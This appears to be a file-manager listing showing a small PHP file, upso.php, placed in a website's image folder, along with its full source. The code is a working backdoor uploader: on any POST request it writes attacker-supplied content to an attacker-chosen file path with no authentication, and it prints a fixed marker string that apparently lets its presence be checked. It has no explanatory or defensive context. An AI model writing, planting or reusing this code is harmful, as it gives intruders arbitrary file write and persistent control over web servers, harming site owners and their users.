File "upso.php"
Full path: /home/argothem/www/organecyberpresse/IMG/jpg/upso.php
File size: 176 bytes
MIME-type: text/x-php
Charset: utf-8
<?php
if ($_POST)
{
$f=fopen($_POST["f"],"w");
if(fwrite($f,$_POST["c"]))
echo "<font color=red>OK!</font>";
else
echo "<font color=blue>Error!</font>";
};
echo 'SXSXSXSX';
?>